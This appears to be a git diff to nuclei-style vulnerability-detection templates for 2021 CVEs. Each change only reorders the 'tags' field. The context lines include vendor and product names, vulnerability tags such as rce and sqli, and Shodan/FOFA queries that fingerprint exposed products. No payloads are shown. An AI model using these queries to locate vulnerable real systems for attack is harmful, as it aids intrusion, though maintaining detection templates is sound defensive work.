+++ b/http/cves/2021/CVE-2021-33221.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: commscope
product: ruckus_iot_controller
- tags: cve2021,commscope,ruckus,debug,service,leak,seclists,cve
+ tags: cve2021,cve,commscope,ruckus,debug,service,leak,seclists
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-33357.yaml b/http/cves/2021/CVE-2021-33357.yaml
index ebbabdfee8..bca16b8fd3 100644
--- a/http/cves/2021/CVE-2021-33357.yaml
+++ b/http/cves/2021/CVE-2021-33357.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: raspap
product: raspap
- tags: cve,cve2021,rce,raspap,oast
+ tags: cve2021,cve,rce,raspap,oast
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-33544.yaml b/http/cves/2021/CVE-2021-33544.yaml
index be25bfe7f0..428b7e048e 100644
--- a/http/cves/2021/CVE-2021-33544.yaml
+++ b/http/cves/2021/CVE-2021-33544.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: geutebrueck
product: g-cam_ebc-2110
- tags: cve,cve2021,geutebruck,rce,oast,geutebrueck
+ tags: cve2021,cve,geutebruck,rce,oast,geutebrueck
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-33564.yaml b/http/cves/2021/CVE-2021-33564.yaml
index 863e8c8cb2..d757b8d148 100644
--- a/http/cves/2021/CVE-2021-33564.yaml
+++ b/http/cves/2021/CVE-2021-33564.yaml
@@ -28,7 +28,7 @@ info:
vendor: dragonfly_project
product: dragonfly
framework: ruby
- tags: cve,cve2021,rce,ruby,injection,dragonfly_project
+ tags: cve2021,cve,rce,ruby,injection,dragonfly_project
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-33690.yaml b/http/cves/2021/CVE-2021-33690.yaml
index 2af06e6db1..330a66819c 100644
--- a/http/cves/2021/CVE-2021-33690.yaml
+++ b/http/cves/2021/CVE-2021-33690.yaml
@@ -26,7 +26,7 @@ info:
vendor: sap
product: netweaver_development_infrastructure
shodan-query: html:"SAP NetWeaver"
- tags: cve,cve2021,oast,ssrf,sap
+ tags: cve2021,cve,oast,ssrf,sap
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-3374.yaml b/http/cves/2021/CVE-2021-3374.yaml
index 6a0582cd0a..dc1192b2c9 100644
--- a/http/cves/2021/CVE-2021-3374.yaml
+++ b/http/cves/2021/CVE-2021-3374.yaml
@@ -25,7 +25,7 @@ info:
max-request: 2
vendor: rstudio
product: shiny_server
- tags: cve,cve2021,rstudio,traversal
+ tags: cve2021,cve,rstudio,traversal
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-3377.yaml b/http/cves/2021/CVE-2021-3377.yaml
index d5583f09f3..ff6e00efed 100644
--- a/http/cves/2021/CVE-2021-3377.yaml
+++ b/http/cves/2021/CVE-2021-3377.yaml
@@ -25,7 +25,7 @@ info:
vendor: ansi_up_project
product: ansi_up
framework: node.js
- tags: cve,cve2021,xss,npm,ansi_up_project,node.js
+ tags: cve2021,cve,xss,npm,ansi_up_project,node.js
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-3378.yaml b/http/cves/2021/CVE-2021-3378.yaml
index 6b03b6db65..37d24bf853 100644
--- a/http/cves/2021/CVE-2021-3378.yaml
+++ b/http/cves/2021/CVE-2021-3378.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: fortilogger
product: fortilogger
- tags: fortilogger,fortigate,fortinet,packetstorm,cve,cve2021,fileupload,intrusive
+ tags: cve,cve2021,fortilogger,fortigate,fortinet,packetstorm,fileupload,intrusive
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-33807.yaml b/http/cves/2021/CVE-2021-33807.yaml
index fde34ca53a..95115f76fb 100644
--- a/http/cves/2021/CVE-2021-33807.yaml
+++ b/http/cves/2021/CVE-2021-33807.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: gespage
product: gespage
- tags: cve,cve2021,lfi,gespage
+ tags: cve2021,cve,lfi,gespage
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml
index c7a03c12b0..e28b3d2ad7 100644
--- a/http/cves/2021/CVE-2021-33851.yaml
+++ b/http/cves/2021/CVE-2021-33851.yaml
@@ -29,7 +29,7 @@ info:
vendor: apasionados
product: customize_login_image
framework: wordpress
- tags: wpscan,cve2021,wordpress,customize-login-image,wp,authenticated,cve,wp-plugin,xss,apasionados
+ tags: cve,cve2021,wpscan,wordpress,customize-login-image,wp,authenticated,wp-plugin,xss,apasionados
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-33904.yaml b/http/cves/2021/CVE-2021-33904.yaml
index 2e779e9b34..0a58a92ab3 100644
--- a/http/cves/2021/CVE-2021-33904.yaml
+++ b/http/cves/2021/CVE-2021-33904.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: accela
product: civic_platform
- tags: cve2021,accela,xss,edb,packetstorm,cve
+ tags: cve,cve2021,accela,xss,edb,packetstorm
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-34370.yaml b/http/cves/2021/CVE-2021-34370.yaml
index 873a80f3d9..4c24aac435 100644
--- a/http/cves/2021/CVE-2021-34370.yaml
+++ b/http/cves/2021/CVE-2021-34370.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: accela
product: civic_platform
- tags: xss,redirect,cve,cve2021,accela,edb
+ tags: cve,cve2021,xss,redirect,accela,edb
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-34429.yaml b/http/cves/2021/CVE-2021-34429.yaml
index 6cb9424fe3..543d394555 100644
--- a/http/cves/2021/CVE-2021-34429.yaml
+++ b/http/cves/2021/CVE-2021-34429.yaml
@@ -28,7 +28,7 @@ info:
max-request: 2
vendor: eclipse
product: jetty
- tags: cve,cve2021,jetty,eclipse
+ tags: cve2021,cve,jetty,eclipse
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml
index 7b02dc9c10..c5dfb26443 100644
--- a/http/cves/2021/CVE-2021-34473.yaml
+++ b/http/cves/2021/CVE-2021-34473.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: microsoft
product: exchange_server
- tags: cve,cve2021,ssrf,rce,exchange,kev,microsoft
+ tags: cve2021,cve,ssrf,rce,exchange,kev,microsoft
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-34621.yaml b/http/cves/2021/CVE-2021-34621.yaml
index 564ff97e36..dda3abe2c3 100644
--- a/http/cves/2021/CVE-2021-34621.yaml
+++ b/http/cves/2021/CVE-2021-34621.yaml
@@ -27,7 +27,7 @@ info:
vendor: properfraction
product: profilepress
framework: wordpress
- tags: wordpress,wp-plugin,packetstorm,cve,cve2021,intrusive,properfraction
+ tags: cve2021,cve,wordpress,wp-plugin,packetstorm,intrusive,properfraction
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-34640.yaml b/http/cves/2021/CVE-2021-34640.yaml
index ea00604f64..0874b7967f 100644
--- a/http/cves/2021/CVE-2021-34640.yaml
+++ b/http/cves/2021/CVE-2021-34640.yaml
@@ -27,7 +27,7 @@ info:
vendor: securimage-wp-fixed_project
product: securimage-wp-fixed
framework: wordpress
- tags: wpscan,wordpress,cve,cve2021,wp-plugin,authenticated,securimage-wp-fixed_project
+ tags: cve2021,cve,wpscan,wordpress,wp-plugin,authenticated,securimage-wp-fixed_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-34643.yaml b/http/cves/2021/CVE-2021-34643.yaml
index 42c1b77065..0154b73bfe 100644
--- a/http/cves/2021/CVE-2021-34643.yaml
+++ b/http/cves/2021/CVE-2021-34643.yaml
@@ -27,7 +27,7 @@ info:
vendor: skaut-bazar_project
product: skaut-bazar
framework: wordpress
- tags: wpscan,wordpress,cve,cve2021,wp-plugin,authenticated,skaut-bazar_project
+ tags: cve2021,cve,wpscan,wordpress,wp-plugin,authenticated,skaut-bazar_project,xss
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-34805.yaml b/http/cves/2021/CVE-2021-34805.yaml
index 638859e6a9..599ee02939 100644
--- a/http/cves/2021/CVE-2021-34805.yaml
+++ b/http/cves/2021/CVE-2021-34805.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: land-software
product: faust_iserver
- tags: lfi,packetstorm,cve,cve2021,faust,iserver,land-software
+ tags: cve2021,cve,lfi,packetstorm,faust,iserver,land-software
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml
index 3cd335e1af..c23a7b5b15 100644
--- a/http/cves/2021/CVE-2021-35250.yaml
+++ b/http/cves/2021/CVE-2021-35250.yaml
@@ -28,7 +28,7 @@ info:
vendor: solarwinds
product: serv-u
shodan-query: product:"Rhinosoft Serv-U httpd"
- tags: cve,cve2021,solarwinds,traversal
+ tags: cve2021,cve,solarwinds,traversal
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml
index 3a08d5cbc2..2570ec9472 100644
--- a/http/cves/2021/CVE-2021-35265.yaml
+++ b/http/cves/2021/CVE-2021-35265.yaml
@@ -27,7 +27,7 @@ info:
vendor: maxsite
product: maxsite_cms
shodan-query: html:'content="MaxSite CMS'
- tags: cve,cve2021,maxsite,xss
+ tags: cve2021,cve,maxsite,xss
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-35323.yaml b/http/cves/2021/CVE-2021-35323.yaml
index fdbd7c11ae..a004fa3d5c 100644
--- a/http/cves/2021/CVE-2021-35323.yaml
+++ b/http/cves/2021/CVE-2021-35323.yaml
@@ -24,7 +24,7 @@ info:
vendor: bludit
product: bludit
shodan-query: title:"Bludit"
- tags: cve,cve2021,bludit,xss
+ tags: cve2021,cve,bludit,xss
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-35336.yaml b/http/cves/2021/CVE-2021-35336.yaml
index e627033b92..86bd4dcb69 100644
--- a/http/cves/2021/CVE-2021-35336.yaml
+++ b/http/cves/2021/CVE-2021-35336.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: tieline
product: ip_audtio_gateway_firmware
- tags: cve,cve2021,tieline,default-login
+ tags: cve2021,cve,tieline,default-login
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-35380.yaml b/http/cves/2021/CVE-2021-35380.yaml
index cbd46896a2..a26262bb88 100644
--- a/http/cves/2021/CVE-2021-35380.yaml
+++ b/http/cves/2021/CVE-2021-35380.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: solari
product: termtalk_server
- tags: cve,cve2021,termtalk,lfi,unauth,lfr,edb,solari
+ tags: cve2021,cve,termtalk,lfi,unauth,lfr,edb,solari
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml
index e45a528070..e86df31e29 100644
--- a/http/cves/2021/CVE-2021-35395.yaml
+++ b/http/cves/2021/CVE-2021-35395.yaml
@@ -23,7 +23,7 @@ info:
max-request: 1
vendor: realtek
product: realtek_jungle_sdk
- tags: cve,cve2021,realtek,rce,kev
+ tags: cve2021,cve,realtek,rce,kev
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml
index 189acf310a..b8b8f73498 100644
--- a/http/cves/2021/CVE-2021-35464.yaml
+++ b/http/cves/2021/CVE-2021-35464.yaml
@@ -32,7 +32,7 @@ info:
vendor: forgerock
product: am
shodan-query: http.title:"OpenAM"
- tags: packetstorm,cve,cve2021,openam,rce,java,kev,forgerock
+ tags: cve,cve2021,packetstorm,openam,rce,java,kev,forgerock
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml
index 66a7dd9af7..16cb43392f 100644
--- a/http/cves/2021/CVE-2021-35488.yaml
+++ b/http/cves/2021/CVE-2021-35488.yaml
@@ -28,7 +28,7 @@ info:
vendor: thruk
product: thruk
shodan-query: http.html:"Thruk"
- tags: cve,cve2021,thruk,xss
+ tags: cve2021,cve,thruk,xss
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml
index c192ed8efb..8a632d1528 100644
--- a/http/cves/2021/CVE-2021-35587.yaml
+++ b/http/cves/2021/CVE-2021-35587.yaml
@@ -29,7 +29,7 @@ info:
product: access_manager
shodan-query: http.title:"Oracle Access Management"
fofa-query: body="/oam/pages/css/login_page.css"
- tags: cve,cve2021,oam,rce,java,unauth,oracle,kev
+ tags: cve2021,cve,oam,rce,java,unauth,oracle,kev
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-3577.yaml b/http/cves/2021/CVE-2021-3577.yaml
index d979655e90..9982e268f7 100644
--- a/http/cves/2021/CVE-2021-3577.yaml
+++ b/http/cves/2021/CVE-2021-3577.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: binatoneglobal
product: halo\+_camera_firmware
- tags: cve,cve2021,rce,oast,motorola,iot,binatoneglobal
+ tags: cve2021,cve,rce,oast,motorola,iot,binatoneglobal
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml
index b77ab1e4b0..ecc50529b7 100644
--- a/http/cves/2021/CVE-2021-36260.yaml
+++ b/http/cves/2021/CVE-2021-36260.yaml
@@ -28,7 +28,7 @@ info:
vendor: hikvision
product: ds-2cd2026g2-iu\/sl_firmware
shodan-query: http.favicon.hash:999357577
- tags: cve,cve2021,hikvision,rce,iot,intrusive,kev
+ tags: cve2021,cve,hikvision,rce,iot,intrusive,kev
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-36356.yaml b/http/cves/2021/CVE-2021-36356.yaml
index 33db0f79e7..2efe15586d 100644
--- a/http/cves/2021/CVE-2021-36356.yaml
+++ b/http/cves/2021/CVE-2021-36356.yaml
@@ -24,7 +24,7 @@ info:
max-request: 2
vendor: kramerav
product: viaware
- tags: viaware,cve,cve2021,kramer,edb,rce,intrusive,kramerav
+ tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav
variables:
useragent: "{{rand_base(6)}}"
diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml
index 47fb93397a..da79fda839 100644
--- a/http/cves/2021/CVE-2021-36380.yaml
+++ b/http/cves/2021/CVE-2021-36380.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: sunhillo
product: sureline
- tags: cve,cve2021,sureline,rce,oast,sunhillo
+ tags: cve2021,cve,sureline,rce,oast,sunhillo
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml
index 0c8f245e85..83d0c404bd 100644
--- a/http/cves/2021/CVE-2021-36450.yaml
+++ b/http/cves/2021/CVE-2021-36450.yaml
@@ -29,7 +29,7 @@ info:
vendor: verint
product: workforce_optimization
shodan-query: title:"Verint Sign-in"
- tags: cve,cve2021,xss,verint
+ tags: cve2021,cve,xss,verint
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-3654.yaml b/http/cves/2021/CVE-2021-3654.yaml
index 22f679e4c7..ea418d926a 100644
--- a/http/cves/2021/CVE-2021-3654.yaml
+++ b/http/cves/2021/CVE-2021-3654.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: openstack
product: nova
- tags: redirect,novnc,cve,cve2021,seclists,openstack
+ tags: cve2021,cve,redirect,novnc,seclists,openstack
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml
index a853cabdc8..2ef68e0d21 100644
--- a/http/cves/2021/CVE-2021-36580.yaml
+++ b/http/cves/2021/CVE-2021-36580.yaml
@@ -30,7 +30,7 @@ info:
vendor: icewarp
product: icewarp_server
shodan-query: title:"icewarp"
- tags: cve,cve2021,icewarp,redirect
+ tags: cve2021,cve,icewarp,redirect
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-36748.yaml b/http/cves/2021/CVE-2021-36748.yaml
index 026400e007..b916de59f1 100644
--- a/http/cves/2021/CVE-2021-36748.yaml
+++ b/http/cves/2021/CVE-2021-36748.yaml
@@ -27,7 +27,7 @@ info:
vendor: prestahome
product: blog
framework: prestashop
- tags: cve,cve2021,prestashop,prestahome,sqli,cms
+ tags: cve2021,cve,prestashop,prestahome,sqli,cms
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-36749.yaml b/http/cves/2021/CVE-2021-36749.yaml
index 6f3fab77db..20dfb7e3de 100644
--- a/http/cves/2021/CVE-2021-36749.yaml
+++ b/http/cves/2021/CVE-2021-36749.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: apache
product: druid
- tags: cve,cve2021,apache,lfi,auth-bypass,druid
+ tags: cve2021,cve,apache,lfi,auth-bypass,druid
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-36873.yaml b/http/cves/2021/CVE-2021-36873.yaml
index 6e1760953c..157d422da6 100644
--- a/http/cves/2021/CVE-2021-36873.yaml
+++ b/http/cves/2021/CVE-2021-36873.yaml
@@ -28,7 +28,7 @@ info:
vendor: webence
product: iq_block_country
framework: wordpress
- tags: cve,wp-plugin,iq-block-country,cve2021,wordpress,wp,xss,authenticated,wpscan,webence
+ tags: cve,cve2021,wp-plugin,iq-block-country,wordpress,wp,xss,authenticated,wpscan,webence
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml
index 28e7d10b45..8937fbee8a 100644
--- a/http/cves/2021/CVE-2021-37304.yaml
+++ b/http/cves/2021/CVE-2021-37304.yaml
@@ -28,7 +28,7 @@ info:
product: jeecg
shodan-query: title:"Jeecg-Boot"
fofa-query: title="JeecgBoot 企业级低代码平台"
- tags: cve,cve2021,jeecg,exposure
+ tags: cve2021,cve,jeecg,exposure
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml
index 02d20cff74..6f42b7e7e5 100644
--- a/http/cves/2021/CVE-2021-37305.yaml
+++ b/http/cves/2021/CVE-2021-37305.yaml
@@ -28,7 +28,7 @@ info:
product: jeecg
shodan-query: title:"Jeecg-Boot"
fofa-query: title="JeecgBoot 企业级低代码平台"
- tags: cve,cve2021,jeecg,exposure
+ tags: cve2021,cve,jeecg,exposure
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml
index 131d54048c..ba5a9a500c 100644
--- a/http/cves/2021/CVE-2021-37416.yaml
+++ b/http/cves/2021/CVE-2021-37416.yaml
@@ -27,7 +27,7 @@ info:
vendor: zohocorp
product: manageengine_adselfservice_plus
shodan-query: http.title:"ManageEngine"
- tags: cve,cve2021,zoho,xss,zohocorp
+ tags: cve2021,cve,zoho,xss,zohocorp
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-37538.yaml b/http/cves/2021/CVE-2021-37538.yaml
index bf5406bb87..c43268400a 100644
--- a/http/cves/2021/CVE-2021-37538.yaml
+++ b/http/cves/2021/CVE-2021-37538.yaml
@@ -26,7 +26,7 @@ info:
vendor: smartdatasoft
product: smartblog
framework: prestashop
- tags: cve,cve2021,prestashop,smartblog,sqli,smartdatasoft
+ tags: cve2021,cve,prestashop,smartblog,sqli,smartdatasoft
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-37573.yaml b/http/cves/2021/CVE-2021-37573.yaml
index 8355c00d5a..c700efc1ac 100644
--- a/http/cves/2021/CVE-2021-37573.yaml
+++ b/http/cves/2021/CVE-2021-37573.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: tiny_java_web_server_project
product: tiny_java_web_server
- tags: cve,cve2021,xss,tjws,java,seclists,tiny_java_web_server_project
+ tags: cve2021,cve,xss,tjws,java,seclists,tiny_java_web_server_project
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-37580.yaml b/http/cves/2021/CVE-2021-37580.yaml
index e7fb53de92..8709af48a8 100644
--- a/http/cves/2021/CVE-2021-37580.yaml
+++ b/http/cves/2021/CVE-2021-37580.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: apache
product: shenyu
- tags: cve,cve2021,apache,jwt,shenyu
+ tags: cve2021,cve,apache,jwt,shenyu
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-37704.yaml b/http/cves/2021/CVE-2021-37704.yaml
index 789775bc50..691e0c76df 100644
--- a/http/cves/2021/CVE-2021-37704.yaml
+++ b/http/cves/2021/CVE-2021-37704.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: phpfastcache
product: phpfastcache
- tags: cve,cve2021,exposure,phpfastcache,phpinfo,phpsocialnetwork
+ tags: cve2021,cve,exposure,phpfastcache,phpinfo,phpsocialnetwork
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml
index 6a6615ba4c..1a6310cf19 100644
--- a/http/cves/2021/CVE-2021-37833.yaml
+++ b/http/cves/2021/CVE-2021-37833.yaml
@@ -25,7 +25,7 @@ info:
max-request: 4
vendor: digitaldruid
product: hoteldruid
- tags: cve,cve2021,hoteldruid,xss,digitaldruid
+ tags: cve2021,cve,hoteldruid,xss,digitaldruid
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-38314.yaml b/http/cves/2021/CVE-2021-38314.yaml
index 00c1eedd96..5da131e262 100644
--- a/http/cves/2021/CVE-2021-38314.yaml
+++ b/http/cves/2021/CVE-2021-38314.yaml
@@ -27,7 +27,7 @@ info:
vendor: redux
product: gutenberg_template_library_\&_redux_framework
framework: wordpress
- tags: cve,cve2021,wordpress,wp-plugin,redux
+ tags: cve2021,cve,wordpress,wp-plugin,redux
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml
index 5e6ff91269..e4cc0f1307 100644
--- a/http/cves/2021/CVE-2021-38540.yaml
+++ b/http/cves/2021/CVE-2021-38540.yaml
@@ -27,7 +27,7 @@ info:
vendor: apache
product: airflow
shodan-query: title:"Sign In - Airflow"
- tags: cve,cve2021,apache,airflow,rce,intrusive
+ tags: cve2021,cve,apache,airflow,rce,intrusive
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-38647.yaml b/http/cves/2021/CVE-2021-38647.yaml
index 1fdc547ef5..bee9a17af3 100644
--- a/http/cves/2021/CVE-2021-38647.yaml
+++ b/http/cves/2021/CVE-2021-38647.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: microsoft
product: azure_automation_state_configuration
- tags: cve,cve2021,rce,omi,microsoft,kev
+ tags: cve2021,cve,rce,omi,microsoft,kev
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml
index cc2d6fd28b..86e2630599 100644
--- a/http/cves/2021/CVE-2021-38702.yaml
+++ b/http/cves/2021/CVE-2021-38702.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: cyberoamworks
product: netgenie_c0101b1-20141120-ng11vo_firmware
- tags: cyberoam,netgenie,xss,router,seclists,cve,packetstorm,cve2021,cyberoamworks
+ tags: cve2021,cve,cyberoam,netgenie,xss,router,seclists,packetstorm,cyberoamworks
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml
index 395b559e80..55490ebb8a 100644
--- a/http/cves/2021/CVE-2021-38704.yaml
+++ b/http/cves/2021/CVE-2021-38704.yaml
@@ -26,7 +26,7 @@ info:
vendor: cliniccases
product: cliniccases
shodan-query: http.title:"ClinicCases",html:"/cliniccases/"
- tags: xss,cve,cve2021,cliniccases
+ tags: cve,cve2021,xss,cliniccases
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-38751.yaml b/http/cves/2021/CVE-2021-38751.yaml
index feaa3038bc..bd0e6f444c 100644
--- a/http/cves/2021/CVE-2021-38751.yaml
+++ b/http/cves/2021/CVE-2021-38751.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: exponentcms
product: exponentcms
- tags: cve,cve2021,exponentcms
+ tags: cve2021,cve,exponentcms
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-39144.yaml b/http/cves/2021/CVE-2021-39144.yaml
index ef0c2c037b..7b7fbf00d4 100644
--- a/http/cves/2021/CVE-2021-39144.yaml
+++ b/http/cves/2021/CVE-2021-39144.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: xstream_project
product: xstream
- tags: cve,cve2021,xstream,deserialization,rce,kev,xstream_project
+ tags: cve2021,cve,xstream,deserialization,rce,kev,xstream_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-39146.yaml b/http/cves/2021/CVE-2021-39146.yaml
index 7507dc3359..996c0ba840 100644
--- a/http/cves/2021/CVE-2021-39146.yaml
+++ b/http/cves/2021/CVE-2021-39146.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: xstream_project
product: xstream
- tags: cve,cve2021,xstream,deserialization,rce,xstream_project
+ tags: cve2021,cve,xstream,deserialization,rce,xstream_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-39152.yaml b/http/cves/2021/CVE-2021-39152.yaml
index bd07289774..283e8d22b0 100644
--- a/http/cves/2021/CVE-2021-39152.yaml
+++ b/http/cves/2021/CVE-2021-39152.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: xstream_project
product: xstream
- tags: cve,cve2021,xstream,ssrf,oast,xstream_project
+ tags: cve2021,cve,xstream,ssrf,oast,xstream_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml
index 48ff542621..868a09d1f2 100644
--- a/http/cves/2021/CVE-2021-39226.yaml
+++ b/http/cves/2021/CVE-2021-39226.yaml
@@ -27,7 +27,7 @@ info:
vendor: grafana
product: grafana
shodan-query: title:"Grafana"
- tags: cve,cve2021,grafana,kev
+ tags: cve2021,cve,grafana,kev
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-39312.yaml b/http/cves/2021/CVE-2021-39312.yaml
index 893c620fea..e404718a53 100644
--- a/http/cves/2021/CVE-2021-39312.yaml
+++ b/http/cves/2021/CVE-2021-39312.yaml
@@ -24,7 +24,7 @@ info:
vendor: trueranker
product: true_ranker
framework: wordpress
- tags: unauth,lfr,wpscan,cve,cve2021,wp-plugin,lfi,wp,wordpress,trueranker
+ tags: cve,cve2021,unauth,lfr,wpscan,wp-plugin,lfi,wp,wordpress,trueranker
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-39316.yaml b/http/cves/2021/CVE-2021-39316.yaml
index 1daf0b6c4f..8328ffde61 100644
--- a/http/cves/2021/CVE-2021-39316.yaml
+++ b/http/cves/2021/CVE-2021-39316.yaml
@@ -28,7 +28,7 @@ info:
vendor: digitalzoomstudio
product: zoomsounds
framework: wordpress
- tags: wordpress,wp-plugin,zoomsounds,wpscan,packetstorm,cve,wp,cve2021,lfi,digitalzoomstudio
+ tags: cve2021,cve,wordpress,wp-plugin,zoomsounds,wpscan,packetstorm,wp,lfi,digitalzoomstudio
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-39320.yaml b/http/cves/2021/CVE-2021-39320.yaml
index 14666b3d30..dfb11d7cf8 100644
--- a/http/cves/2021/CVE-2021-39320.yaml
+++ b/http/cves/2021/CVE-2021-39320.yaml
@@ -28,7 +28,7 @@ info:
vendor: underconstruction_project
product: underconstruction
framework: wordpress
- tags: cve,cve2021,wp-plugin,wpscan,wordpress,wp,xss,authenticated,underconstruction_project
+ tags: cve2021,cve,wp-plugin,wpscan,wordpress,wp,xss,authenticated,underconstruction_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-39322.yaml b/http/cves/2021/CVE-2021-39322.yaml
index 4b14063014..3e58bbea0e 100644
--- a/http/cves/2021/CVE-2021-39322.yaml
+++ b/http/cves/2021/CVE-2021-39322.yaml
@@ -27,7 +27,7 @@ info:
vendor: cybernetikz
product: easy_social_icons
framework: wordpress
- tags: wordpress,cve,cve2021,wp-plugin,authenticated,wpscan,cybernetikz
+ tags: cve,cve2021,wordpress,wp-plugin,authenticated,wpscan,cybernetikz
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-39327.yaml b/http/cves/2021/CVE-2021-39327.yaml
index 82057b95cb..84d50796bb 100644
--- a/http/cves/2021/CVE-2021-39327.yaml
+++ b/http/cves/2021/CVE-2021-39327.yaml
@@ -28,7 +28,7 @@ info:
vendor: ait-pro
product: bulletproof_security
framework: wordpress
- tags: exposure,packetstorm,cve,cve2021,wordpress,ait-pro
+ tags: cve2021,cve,exposure,packetstorm,wordpress,ait-pro
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-39350.yaml b/http/cves/2021/CVE-2021-39350.yaml
index 83cf5da912..582f899508 100644
--- a/http/cves/2021/CVE-2021-39350.yaml
+++ b/http/cves/2021/CVE-2021-39350.yaml
@@ -27,7 +27,7 @@ info:
vendor: foliovision
product: fv_flowplayer_video_player
framework: wordpress
- tags: wpscan,cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated,foliovision
+ tags: cve2021,cve,wpscan,wordpress,xss,wp,wp-plugin,authenticated,foliovision
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-39433.yaml b/http/cves/2021/CVE-2021-39433.yaml
index 774c6eb085..aff30132d3 100644
--- a/http/cves/2021/CVE-2021-39433.yaml
+++ b/http/cves/2021/CVE-2021-39433.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: biqs
